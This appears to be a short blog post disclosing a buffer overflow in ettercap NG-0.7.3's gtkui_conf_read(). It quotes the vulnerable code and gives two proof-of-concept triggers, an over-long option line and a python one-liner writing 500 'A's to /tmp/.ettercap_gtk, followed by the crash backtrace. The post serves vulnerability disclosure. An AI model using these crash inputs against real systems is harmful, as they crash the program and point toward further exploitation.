Indeed, after looking at the source in ettercap_ng/src/interfaces/gtk/ec_gtk_conf.c file we have a function named gtkui_conf_read() which never test the return code of sscanf(), a possible buffer overflow can be achieved here.
void gtkui_conf_read(void) {
FILE *fd;
char *path;
char line[50], name[30];
short value;
#ifdef OS_WINDOWS
path = ec_win_get_user_dir();
#else
/* TODO: get the dopped privs home dir instead of "/root" */
/* path = g_get_home_dir(); */
path = g_get_tmp_dir();
#endif
filename = g_build_filename(path, ".ettercap_gtk", NULL);
DEBUG_MSG("gtkui_conf_read: %s", filename);
fd = fopen(filename, "r");
if(!fd)
return;
while(fgets(line, 100, fd)) {
sscanf(line, "%s = %hd", name, &value);
gtkui_conf_set(name, value);
}
fclose(fd);
}
Also this function never insure the .ettercap_gtk file content is ok, so we can trigger it in differents ways.
$ cat>/tmp/.ettercap_gtk
ettercap_super_option_to_crash_because_its_over_thirty_chars = 42
^D
$ ettercap -G
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Dissector "dns" not supported (etter.conf line 70)
*** buffer overflow detected ***: ettercap terminated
======= Backtrace: =========
/lib/libc.so.6(__fortify_fail+0x37)[0x7fe1f4e8e237]
/lib/libc.so.6(+0xfe0f0)[0x7fe1f4e8d0f0]
/lib/libc.so.6(__fgets_chk+0x159)[0x7fe1f4e8d459]
ettercap(gtkui_conf_read+0x97)[0x45f4e7]
ettercap[0x454c2f]
ettercap(ui_init+0x19)[0x42d2f9]
ettercap(main+0x3ca)[0x41ff0a]
/lib/libc.so.6(__libc_start_main+0xfd)[0x7fe1f4dadc4d]
ettercap[0x414509]
======= Memory map: ========
00400000-00475000 r-xp 00000000 08:05 8396 /usr/sbin/ettercap
00674000-00675000 r--p 00074000 08:05 8396 /usr/sbin/ettercap
00675000-00678000 rw-p 00075000 08:05 8396 /usr/sbin/ettercap
00678000-00685000 rw-p 00000000 00:00 0
00a72000-00b18000 rw-p 00000000 00:00 0 [heap]
...
or in a basic way:
$ python -c 'print "A"*500' > /tmp/.ettercap_gtk && ettercap -G
*** buffer overflow detected ***: ettercap terminated
I was found this one on launchpad, reported by Dan Rosenberg.
0 comments:
Post a Comment